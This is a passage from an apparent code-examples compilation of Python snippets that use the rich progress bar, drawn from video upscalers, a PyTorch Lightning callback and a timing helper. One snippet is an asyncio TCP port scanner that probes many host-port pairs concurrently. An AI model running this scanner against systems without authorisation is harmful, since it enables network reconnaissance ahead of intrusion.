            frame_rate * 2 if mode == "interpolate" else frame_rate,
            output_path,
            output_width,
            output_height,
            total_frames,
            processed_frames,
            self.processed,
            self.pause,
        )
        self.encoder.start()

        # create processor processes
        for process_name in range(processes):
            process = Processor(self.processing_queue, processed_frames, self.pause)
            process.name = str(process_name)
            process.daemon = True
            process.start()
            self.processor_processes.append(process)

        # create progress bar
        self.progress = Progress(
            "[progress.description]{task.description}",
            BarColumn(complete_style="blue", finished_style="green"),
            "[progress.percentage]{task.percentage:>3.0f}%",
            "[color(240)]({task.completed}/{task.total})",
            ProcessingSpeedColumn(),
            TimeElapsedColumn(),
            "<",
            TimeRemainingColumn(),
            console=console,
            speed_estimate_period=300.0,
            disable=True,
        )

        self.description = f"[cyan]{MODE_LABELS.get(mode, 'Unknown')}"
        self.task = self.progress.add_task(self.description, total=total_frames)

        # allow sending SIGUSR1 to pause/resume processing
        signal.signal(signal.SIGUSR1, self._toggle_pause)

        # enable global pause hotkey if it's supported
        if ENABLE_HOTKEY is True:

            # create global pause hotkey
            pause_hotkey = pynput.keyboard.HotKey(
                pynput.keyboard.HotKey.parse("<ctrl>+<alt>+v"), self._toggle_pause
            )

            # create global keyboard input listener
            keyboard_listener = pynput.keyboard.Listener(
                on_press=(
                    lambda key: pause_hotkey.press(keyboard_listener.canonical(key))
                ),
                on_release=(
                    lambda key: pause_hotkey.release(keyboard_listener.canonical(key))
                ),
            )

            # start monitoring global key presses
            keyboard_listener.start()

        # a temporary variable that stores the exception
        exception = []

        try:

            # wait for jobs in queue to deplete
            while self.processed.value < total_frames - 1:
                time.sleep(1)

                # check processor health
                for process in self.processor_processes:
                    if not process.is_alive():
                        raise Exception("process died unexpectedly")

                # check decoder health
                if not self.decoder.is_alive() and self.decoder.exception is not None:
                    raise Exception("decoder died unexpectedly")

                # check encoder health
                if not self.encoder.is_alive() and self.encoder.exception is not None:
                    raise Exception("encoder died unexpectedly")

                # show progress bar when upscale starts
                if self.progress.disable is True and self.processed.value > 0:
                    self.progress.disable = False
                    self.progress.start()

                # update progress
                if self.pause.value is False:
                    self.progress.update(self.task, completed=self.processed.value)

            self.progress.update(self.task, completed=total_frames)
            self.progress.stop()
            logger.info("Processing has completed")

        # if SIGTERM is received or ^C is pressed
        # TODO: pause and continue here
        except (SystemExit, KeyboardInterrupt) as e:
            self.progress.stop()
            logger.warning("Exit signal received, exiting gracefully")
            logger.warning("Press ^C again to force terminate")
            exception.append(e)

        except Exception as e:
            self.progress.stop()
            logger.exception(e)
            exception.append(e)

        finally:

            # stop keyboard listener
            if ENABLE_HOTKEY is True:
                keyboard_listener.stop()
                keyboard_listener.join()

            # stop progress display
            self.progress.stop()

            # stop processor processes
            logger.info("Stopping processor processes")
            for process in self.processor_processes:
                process.terminate()

            # wait for processes to finish
            for process in self.processor_processes:
                process.join()

            # stop encoder and decoder
            logger.info("Stopping decoder and encoder threads")
            self.decoder.stop()
            self.encoder.stop()
            self.decoder.join()
            self.encoder.join()

            # mark processing queue as closed
            self.processing_queue.close()

            # raise the error if there is any
            if len(exception) > 0:
                raise exception[0]

            # restore original STDOUT and STDERR
            sys.stdout = original_stdout
            sys.stderr = original_stderr

            # re-add Loguru to point to the restored STDERR
            logger.remove()
            logger.add(sys.stderr, colorize=True, format=LOGURU_FORMAT)

    def upscale(
        self,
        input_path: pathlib.Path,
        output_path: pathlib.Path,
        output_width: int,
        output_height: int,
        noise: int,
        processes: int,
        threshold: float,
        algorithm: str,
    ) -> None:

        # get basic video information
        width, height, total_frames, frame_rate = self._get_video_info(input_path)

        # automatically calculate output width and height if only one is given
        if output_width == 0 or output_width is None:
            output_width = output_height / height * width

        elif output_height == 0 or output_height is None:
            output_height = output_width / width * height

        # sanitize output width and height to be divisible by 2
        output_width = int(math.ceil(output_width / 2.0) * 2)
        output_height = int(math.ceil(output_height / 2.0) * 2)

        # start processing
        self._run(
            input_path,
            width,
            height,
            total_frames,
            frame_rate,
            output_path,
            output_width,
            output_height,
            Upscaler,
            "upscale",
            processes,
            (
                output_width,
                output_height,
                noise,
                threshold,
                algorithm,
            ),
        )

    def interpolate(
        self,
        input_path: pathlib.Path,
        output_path: pathlib.Path,
        processes: int,
        threshold: float,
        algorithm: str,
    ) -> None:

        # get video basic information
        width, height, original_frames, frame_rate = self._get_video_info(input_path)

        # calculate the number of total output frames
        total_frames = original_frames * 2 - 1

        # start processing
        self._run(
            input_path,
            width,
            height,
            total_frames,
            frame_rate,
            output_path,
            width,
            height,
            Interpolator,
            "interpolate",
            processes,
            (threshold, algorithm),
        )
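
# Hedged usage sketch (not from the original project): file names and
# parameter values below are illustrative assumptions only.
import pathlib

video2x = Video2X()
video2x.upscale(
    input_path=pathlib.Path("input.mp4"),
    output_path=pathlib.Path("output.mp4"),
    output_width=0,        # 0/None: derived from output_height and the aspect ratio
    output_height=1440,
    noise=3,
    processes=2,
    threshold=0.0,
    algorithm="waifu2x",   # assumed algorithm name, purely illustrative
)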
Exemplo n.º 23
0
class TimeLoop:
    """
    A special iterator that will iterate for a specified duration of time.

    Uses a progress meter to show the user how much time is left.
    Each iteration of the time-loop produces a tick.
    """

    advent: Optional[pendulum.DateTime]
    moment: Optional[pendulum.DateTime]
    last_moment: Optional[pendulum.DateTime]
    counter: int
    progress: Optional[Progress]
    duration: pendulum.Duration
    message: str
    color: str

    def __init__(
        self,
        duration: Union[pendulum.Duration, int],
        message: str = "Processing",
        color: str = "green",
    ):
        """
        Initialize the time-loop.

        Duration may be either a count of seconds or a ``pendulum.duration``.
        """
        self.moment = None
        self.last_moment = None
        self.counter = 0
        self.progress = None
        if isinstance(duration, int):
            JobbergateCliError.require_condition(
                duration > 0, "The duration must be a positive integer")
            self.duration = pendulum.duration(seconds=duration)
        else:
            self.duration = duration
        self.message = message
        self.color = color

    def __del__(self):
        """
        Explicitly clear the progress meter if the time-loop is destroyed.
        """
        self.clear()

    def __iter__(self) -> "TimeLoop":
        """
        Start the iterator.

        Creates and starts the progress meter
        """
        self.advent = self.last_moment = self.moment = pendulum.now()
        self.counter = 0
        self.progress = Progress()
        self.progress.add_task(
            f"[{self.color}]{self.message}...",
            total=self.duration.total_seconds(),
        )
        self.progress.start()
        return self

    def __next__(self) -> Tick:
        """
        Iterates the time loop and returns a tick.

        If the duration is complete, clear the progress meter and stop iteration.
        """
        # Keep mypy happy
        assert self.progress is not None

        self.counter += 1
        self.last_moment = self.moment
        self.moment: pendulum.DateTime = pendulum.now()
        elapsed: pendulum.Duration = self.moment - self.last_moment
        total_elapsed: pendulum.Duration = self.moment - self.advent

        for task_id in self.progress.task_ids:
            self.progress.advance(task_id, elapsed.total_seconds())

        if self.progress.finished:
            self.clear()
            raise StopIteration

        return Tick(
            counter=self.counter,
            elapsed=elapsed,
            total_elapsed=total_elapsed,
        )

    def clear(self):
        """
        Clear the time-loop.

        Stops the progress meter (if it is set) and resets the moments, the counter, and the progress meter.
        """
        if self.progress is not None:
            self.progress.stop()
        self.counter = 0
        self.progress = None
        self.moment = None
        self.last_moment = None
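
# Hedged usage sketch: poll some condition for up to 30 seconds while the
# progress meter counts down. `poll_job_status` is a hypothetical placeholder.
import time

def poll_job_status() -> bool:
    return False  # hypothetical predicate, always pending in this sketch

for tick in TimeLoop(30, message="Waiting for job", color="cyan"):
    # each Tick carries counter, elapsed, and total_elapsed
    if poll_job_status():
        break
    time.sleep(1)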
Exemplo n.º 24
0
"""

from time import sleep

from rich.live import Live
from rich.panel import Panel
from rich.progress import Progress, SpinnerColumn, BarColumn, TextColumn
from rich.table import Table

job_progress = Progress(
    "{task.description}",
    SpinnerColumn(),
    BarColumn(),
    TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
)
job1 = job_progress.add_task("[green]Cooking")
job2 = job_progress.add_task("[magenta]Baking", total=200)
job3 = job_progress.add_task("[cyan]Mixing", total=400)

total = sum(task.total for task in job_progress.tasks)
overall_progress = Progress()
overall_task = overall_progress.add_task("All Jobs", total=int(total))

progress_table = Table.grid()
progress_table.add_row(
    Panel.fit(overall_progress,
              title="Overall Progress",
              border_style="green",
              padding=(2, 2)),
    Panel.fit(job_progress,
              title="[b]Jobs",
              border_style="red",
              padding=(1, 2)),
)
Exemplo n.º 25
0
class PortScan(object):
    def __init__(self, targets, port_list, rate=2000, timeout=3):
        super(PortScan, self).__init__()
        self.targets = targets
        self.hosts = []
        self.rate = rate  # concurrency limit
        self.timeout = timeout
        self.open_list = {}
        self.port_list = port_list  # ports to scan
        self.process = Progress(
            "[progress.description]{task.description}",
            BarColumn(),
            "[progress.percentage]{task.percentage:>3.1f}%",
            "•",
            "[bold green]{task.completed}/{task.total}",
            "•",
            TransferSpeedColumn(),
            "•",
            TimeRemainingColumn(),
            transient=True,  # hide the bar once it reaches 100%
        )
        self.progress_bar = self.process.add_task("[cyan]port scan...",
                                                  total=len(self.targets) *
                                                  len(self.port_list))

    async def async_port_check(self, semaphore, host_port):
        async with semaphore:
            host, port = host_port
            try:
                conn = asyncio.open_connection(host, port)
                reader, writer = await asyncio.wait_for(conn,
                                                        timeout=self.timeout)
                writer.close()  # close the socket, not the coroutine object
                return host, port, 'open'
            except Exception:
                return host, port, 'close'

    # callback: advance the progress bar and record open ports
    def callback(self, future):
        host, port, status = future.result()
        self.process.advance(self.progress_bar, advance=1)
        if status == "open":
            # print(host, port, status)
            self.open_list.setdefault(host, []).append(port)

    def async_tcp_port_scan(self):
        # URLs with a scheme (e.g. https://127.0.0.1) are not supported,
        # so normalize the targets down to bare hosts first
        for url in self.targets:
            host, scheme = get_host(url)
            self.hosts.append(host)

        host_port_list = [(host, int(port)) for host in self.hosts
                          for port in self.port_list]

        # shuffle into a random scan order
        random.shuffle(host_port_list)

        if platform.system() != "Windows":
            # the uvloop policy must be installed before the event loop is created
            import uvloop
            asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())

        sem = asyncio.Semaphore(self.rate)  # limit concurrency
        loop = asyncio.get_event_loop()

        tasks = []
        with self.process:
            for host_port in host_port_list:
                task = asyncio.ensure_future(
                    self.async_port_check(sem, host_port))
                task.add_done_callback(self.callback)
                tasks.append(task)

            loop.run_until_complete(asyncio.wait(tasks))

        return self.open_list
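
# Hedged usage sketch: targets and ports are illustrative values, and
# `get_host` is assumed to come from the surrounding project.
scanner = PortScan(
    targets=["127.0.0.1", "192.168.1.10"],
    port_list=[22, 80, 443, 8080],
    rate=1000,
    timeout=3,
)
open_ports = scanner.async_tcp_port_scan()
print(open_ports)  # e.g. {'127.0.0.1': [80, 443]}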
Exemplo n.º 26
0
class RichProgressBar(ProgressBarBase):
    """Create a progress bar with `rich text formatting <https://github.com/willmcgugan/rich>`_.

    Install it with pip:

    .. code-block:: bash

        pip install rich

    .. code-block:: python

        from pytorch_lightning import Trainer
        from pytorch_lightning.callbacks import RichProgressBar

        trainer = Trainer(callbacks=RichProgressBar())

    Args:
        refresh_rate: the number of updates per second, must be strictly positive

    Raises:
        ImportError:
            If required `rich` package is not installed on the device.
    """
    def __init__(self, refresh_rate: float = 1.0):
        if not _RICH_AVAILABLE:
            raise ImportError(
                "`RichProgressBar` requires `rich` to be installed. Install it by running `pip install rich`."
            )
        super().__init__()
        self._refresh_rate: float = refresh_rate
        self._enabled: bool = True
        self._total_val_batches: int = 0
        self.progress: Optional[Progress] = None
        self.val_sanity_progress_bar_id: Optional[int] = None
        self.main_progress_bar_id: Optional[int] = None
        self.val_progress_bar_id: Optional[int] = None
        self.test_progress_bar_id: Optional[int] = None
        self.predict_progress_bar_id: Optional[int] = None
        self.console = Console(record=True)

    @property
    def refresh_rate(self) -> float:
        return self._refresh_rate

    @property
    def is_enabled(self) -> bool:
        return self._enabled and self.refresh_rate > 0

    @property
    def is_disabled(self) -> bool:
        return not self.is_enabled

    def disable(self) -> None:
        self._enabled = False

    def enable(self) -> None:
        self._enabled = True

    @property
    def sanity_check_description(self) -> str:
        return "[Validation Sanity Check]"

    @property
    def validation_description(self) -> str:
        return "[Validation]"

    @property
    def test_description(self) -> str:
        return "[Testing]"

    @property
    def predict_description(self) -> str:
        return "[Predicting]"

    def setup(self, trainer, pl_module, stage):
        self.progress = Progress(
            SpinnerColumn(),
            TextColumn("[progress.description]{task.description}"),
            BarColumn(),
            BatchesProcessedColumn(),
            "[",
            CustomTimeColumn(),
            ProcessingSpeedColumn(),
            MetricsTextColumn(trainer, pl_module, stage),
            "]",
            console=self.console,
            refresh_per_second=self.refresh_rate,
        ).__enter__()

    def on_sanity_check_start(self, trainer, pl_module):
        super().on_sanity_check_start(trainer, pl_module)
        self.val_sanity_progress_bar_id = self.progress.add_task(
            f"[{STYLES['sanity_check']}]{self.sanity_check_description}",
            total=trainer.num_sanity_val_steps,
        )

    def on_sanity_check_end(self, trainer, pl_module):
        super().on_sanity_check_end(trainer, pl_module)
        self.progress.update(self.val_sanity_progress_bar_id, visible=False)

    def on_train_epoch_start(self, trainer, pl_module):
        super().on_train_epoch_start(trainer, pl_module)
        total_train_batches = self.total_train_batches
        self._total_val_batches = self.total_val_batches
        if total_train_batches != float("inf"):
            # val can be checked multiple times per epoch
            val_checks_per_epoch = total_train_batches // trainer.val_check_batch
            self._total_val_batches = self._total_val_batches * val_checks_per_epoch

        total_batches = total_train_batches + self._total_val_batches

        train_description = self._get_train_description(trainer.current_epoch)

        self.main_progress_bar_id = self.progress.add_task(
            f"[{STYLES['train']}]{train_description}",
            total=total_batches,
        )

    def on_validation_epoch_start(self, trainer, pl_module):
        super().on_validation_epoch_start(trainer, pl_module)
        if self._total_val_batches > 0:
            self.val_progress_bar_id = self.progress.add_task(
                f"[{STYLES['validate']}]{self.validation_description}",
                total=self._total_val_batches,
            )

    def on_validation_epoch_end(self, trainer, pl_module):
        super().on_validation_epoch_end(trainer, pl_module)
        if self.val_progress_bar_id is not None:
            self.progress.update(self.val_progress_bar_id, visible=False)

    def on_test_epoch_start(self, trainer, pl_module):
        super().on_test_epoch_start(trainer, pl_module)
        self.test_progress_bar_id = self.progress.add_task(
            f"[{STYLES['test']}]{self.test_description}",
            total=self.total_test_batches,
        )

    def on_predict_epoch_start(self, trainer, pl_module):
        super().on_predict_epoch_start(trainer, pl_module)
        self.predict_progress_bar_id = self.progress.add_task(
            f"[{STYLES['predict']}]{self.predict_description}",
            total=self.total_predict_batches,
        )

    def on_train_batch_end(self, trainer, pl_module, outputs, batch, batch_idx,
                           dataloader_idx):
        super().on_train_batch_end(trainer, pl_module, outputs, batch,
                                   batch_idx, dataloader_idx)
        if self._should_update(
                self.train_batch_idx,
                self.total_train_batches + self.total_val_batches):
            self.progress.update(self.main_progress_bar_id, advance=1.0)

    def on_validation_batch_end(self, trainer, pl_module, outputs, batch,
                                batch_idx, dataloader_idx):
        super().on_validation_batch_end(trainer, pl_module, outputs, batch,
                                        batch_idx, dataloader_idx)
        if trainer.sanity_checking:
            self.progress.update(self.val_sanity_progress_bar_id, advance=1.0)
        elif self.val_progress_bar_id is not None and self._should_update(
                self.val_batch_idx,
                self.total_train_batches + self.total_val_batches):
            self.progress.update(self.main_progress_bar_id, advance=1.0)
            self.progress.update(self.val_progress_bar_id, advance=1.0)

    def on_test_batch_end(self, trainer, pl_module, outputs, batch, batch_idx,
                          dataloader_idx):
        super().on_test_batch_end(trainer, pl_module, outputs, batch,
                                  batch_idx, dataloader_idx)
        if self._should_update(self.test_batch_idx, self.total_test_batches):
            self.progress.update(self.test_progress_bar_id, advance=1.0)

    def on_predict_batch_end(self, trainer, pl_module, outputs, batch,
                             batch_idx, dataloader_idx):
        super().on_predict_batch_end(trainer, pl_module, outputs, batch,
                                     batch_idx, dataloader_idx)
        if self._should_update(self.predict_batch_idx,
                               self.total_predict_batches):
            self.progress.update(self.predict_progress_bar_id, advance=1.0)

    def _should_update(self, current, total) -> bool:
        return self.is_enabled and (current % self.refresh_rate == 0
                                    or current == total)

    def _get_train_description(self, current_epoch: int) -> str:
        train_description = f"[Epoch {current_epoch}]"
        if len(self.validation_description) > len(train_description):
            # Padding is required to avoid flickering due to the uneven lengths
            # of the "Epoch X" and "Validation" bar descriptions
            num_digits = len(str(current_epoch))
            required_padding = (len(self.validation_description) -
                                len(train_description) + 1) - num_digits
            for _ in range(required_padding):
                train_description += " "
        return train_description

    def teardown(self, trainer, pl_module, stage):
        self.progress.__exit__(None, None, None)
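
# Hedged sketch of the lifecycle pattern used above: the Progress display is
# opened manually with __enter__ in setup() and closed in teardown(), rather
# than with a `with` block, because the two hooks are separate callbacks.
# `ManualProgress` is a hypothetical reduction, not part of the original class.
from rich.progress import Progress

class ManualProgress:
    def setup(self):
        self.progress = Progress().__enter__()  # start the live display
        self.task = self.progress.add_task("work", total=10)

    def step(self):
        self.progress.update(self.task, advance=1.0)

    def teardown(self):
        self.progress.__exit__(None, None, None)  # stop the live display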
Exemplo n.º 27
0
Arquivo: run.py Projeto: efonte/ESRGAN
def video_thread_func(
    device: torch.device,
    num_lock: int,
    multi_gpu: bool,
    input: Path,
    start_frame: int,
    end_frame: int,
    num_frames: int,
    progress: Progress,
    task_upscaled_id: TaskID,
    ai_upscaled_path: Path,
    fps: int,
    quality: float,
    ffmpeg_params: str,
    deinterpaint: DeinterpaintOptions,
    diff_mode: bool,
    ssim: bool,
    min_ssim: float,
    chunk_size: int,
    padding_size: int,
    scale: int,
    upscale: Upscale,
    config: configparser.ConfigParser,
    scenes_ini: Path,
):
    log = logging.getLogger()
    video_reader: FfmpegFormat.Reader = imageio.get_reader(
        str(input.absolute()))
    start_time = time.process_time()
    last_frame = None
    last_frame_ai = None
    current_frame = None
    frames_diff: List[Optional[FrameDiff]] = []
    video_reader.set_image_index(start_frame - 1)
    start_frame_str = str(start_frame).zfill(len(str(num_frames)))
    end_frame_str = str(end_frame).zfill(len(str(num_frames)))
    task_scene_desc = f'Scene [green]"{start_frame_str}_{end_frame_str}"[/]'
    if multi_gpu and len(upscale.devices) > 1:
        if device.type == "cuda":
            device_name = torch.cuda.get_device_name(device.index)
        else:
            device_name = "CPU"
        task_scene_desc += f" ({device_name})"
    task_scene_id = progress.add_task(
        description=task_scene_desc,
        total=end_frame - start_frame + 1,
        completed=0,
        refresh=True,
    )
    video_writer_params = {"quality": quality, "macro_block_size": None}
    if ffmpeg_params:
        if "-crf" in ffmpeg_params:
            del video_writer_params["quality"]
        video_writer_params["output_params"] = ffmpeg_params.split()
    video_writer: FfmpegFormat.Writer = imageio.get_writer(
        str(
            ai_upscaled_path.joinpath(
                f"{start_frame_str}_{end_frame_str}.mp4").absolute()),
        fps=fps,
        **video_writer_params,
    )
    duplicated_frames = 0
    total_duplicated_frames = 0
    for current_frame_idx in range(start_frame, end_frame + 1):
        frame = video_reader.get_next_data()

        if deinterpaint is not None:
            for i in range(
                    0 if deinterpaint == DeinterpaintOptions.even else 1,
                    frame.shape[0], 2):
                frame[i:i + 1] = (0, 255, 0)  # (B, G, R)

        if not diff_mode:
            if last_frame is not None and are_same_imgs(
                    last_frame, frame, ssim, min_ssim):
                frame_ai = last_frame_ai
                if duplicated_frames == 0:
                    start_duplicated_frame = current_frame_idx - 1
                duplicated_frames += 1
            else:
                frame_ai = upscale.image(frame,
                                         device,
                                         multi_gpu_release_device=False)
                if duplicated_frames != 0:
                    start_duplicated_frame_str = str(
                        start_duplicated_frame).zfill(len(str(num_frames)))
                    current_frame_idx_str = str(current_frame_idx - 1).zfill(
                        len(str(num_frames)))
                    log.info(
                        f"Detected {duplicated_frames} duplicated frame{'' if duplicated_frames==1 else 's'} ({start_duplicated_frame_str}-{current_frame_idx_str})"
                    )
                    total_duplicated_frames += duplicated_frames
                    duplicated_frames = 0
            video_writer.append_data(frame_ai)
            last_frame = frame
            last_frame_ai = frame_ai
            progress.advance(task_upscaled_id)
            progress.advance(task_scene_id)
        else:
            if current_frame is None:
                current_frame = frame
            else:
                frame_diff = get_diff_frame(current_frame, frame, chunk_size,
                                            padding_size, ssim, min_ssim)
                if frame_diff is None:
                    # the frame is identical to current_frame: the best scenario
                    frames_diff.append(frame_diff)
                else:
                    h_diff, w_diff, c_diff = frame_diff.frame.shape
                    h, w, c = current_frame.shape
                    if w * h > w_diff * h_diff:  # TODO difference of size > 20%
                        frames_diff.append(frame_diff)
                    else:
                        current_frame_ai = upscale.image(
                            current_frame,
                            device,
                            multi_gpu_release_device=False)
                        video_writer.append_data(current_frame_ai)
                        progress.advance(task_upscaled_id)
                        progress.advance(task_scene_id)
                        current_frame = frame
                        for frame_diff in frames_diff:
                            if frame_diff is None:
                                frame_ai = current_frame_ai
                            else:
                                diff_ai = upscale.image(
                                    frame_diff.frame,
                                    device,
                                    multi_gpu_release_device=False,
                                )
                                frame_diff_ai = frame_diff
                                frame_diff_ai.frame = diff_ai
                                frame_ai = get_frame(
                                    current_frame_ai,
                                    frame_diff_ai,
                                    scale,
                                    chunk_size,
                                    padding_size,
                                )
                            video_writer.append_data(frame_ai)
                            progress.advance(task_upscaled_id)
                            progress.advance(task_scene_id)
                        frames_diff = []
    if diff_mode:
        if len(frames_diff) > 0:
            current_frame_ai = upscale.image(current_frame,
                                             device,
                                             multi_gpu_release_device=False)
            video_writer.append_data(current_frame_ai)
            progress.advance(task_upscaled_id)
            progress.advance(task_scene_id)
            for frame_diff in frames_diff:
                if frame_diff is None:
                    frame_ai = current_frame_ai
                else:
                    diff_ai = upscale.image(frame_diff.frame,
                                            device,
                                            multi_gpu_release_device=False)
                    frame_diff_ai = frame_diff
                    frame_diff_ai.frame = diff_ai
                    frame_ai = get_frame(
                        current_frame_ai,
                        frame_diff_ai,
                        scale,
                        chunk_size,
                        padding_size,
                    )
                video_writer.append_data(frame_ai)
                progress.advance(task_upscaled_id)
                progress.advance(task_scene_id)
            current_frame = None
            frames_diff = []
        elif current_frame is not None:
            current_frame_ai = upscale.image(current_frame,
                                             device,
                                             multi_gpu_release_device=False)
            video_writer.append_data(current_frame_ai)
            progress.advance(task_upscaled_id)
            progress.advance(task_scene_id)
    if duplicated_frames != 0:
        start_duplicated_frame_str = str(start_duplicated_frame).zfill(
            len(str(num_frames)))
        current_frame_idx_str = str(current_frame_idx - 1).zfill(
            len(str(num_frames)))
        log.info(
            f"Detected {duplicated_frames} duplicated frame{'' if duplicated_frames==1 else 's'} ({start_duplicated_frame_str}-{current_frame_idx_str})"
        )
        total_duplicated_frames += duplicated_frames
        duplicated_frames = 0

    video_writer.close()
    task_scene = next(task for task in progress.tasks
                      if task.id == task_scene_id)

    config.set(f"{start_frame_str}_{end_frame_str}", "upscaled", "True")
    config.set(
        f"{start_frame_str}_{end_frame_str}",
        "duplicated_frames",
        f"{total_duplicated_frames}",
    )
    finished_speed = task_scene.finished_speed or task_scene.speed or 0.01
    config.set(
        f"{start_frame_str}_{end_frame_str}",
        "average_fps",
        f"{finished_speed:.2f}",
    )
    with open(scenes_ini, "w") as configfile:
        config.write(configfile)
    log.info(
        f"Frames from {str(start_frame).zfill(len(str(num_frames)))} to {str(end_frame).zfill(len(str(num_frames)))} upscaled in {precisedelta(dt.timedelta(seconds=time.process_time() - start_time))}"
    )
    if total_duplicated_frames > 0:
        total_frames = end_frame - (start_frame - 1)
        seconds_saved = (((1 / finished_speed * total_frames) - (
            total_duplicated_frames * 0.04)  # 0.04 seconds per duplicate frame
                          ) / (total_frames - total_duplicated_frames) *
                         total_duplicated_frames)
        log.info(
            f"Total number of duplicated frames from {str(start_frame).zfill(len(str(num_frames)))} to {str(end_frame).zfill(len(str(num_frames)))}: {total_duplicated_frames} (saved ≈ {precisedelta(dt.timedelta(seconds=seconds_saved))})"
        )
    progress.remove_task(task_scene_id)
    if multi_gpu:
        upscale.devices[device][num_lock].release()
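
# Hedged sketch of the duplicate-frame shortcut used above: compare
# consecutive frames with SSIM and reuse the previous upscaled frame when
# they match. This `are_same_imgs` is a stand-in under the assumption that
# scikit-image is available; the original project's helper may differ.
import numpy as np
from skimage.metrics import structural_similarity

def are_same_imgs(a: np.ndarray, b: np.ndarray, use_ssim: bool,
                  min_ssim: float) -> bool:
    if not use_ssim:
        # exact comparison: only byte-identical frames count as duplicates
        return np.array_equal(a, b)
    # perceptual comparison: treat frames above the SSIM threshold as equal
    score = structural_similarity(a, b, channel_axis=-1, data_range=255)
    return score >= min_ssim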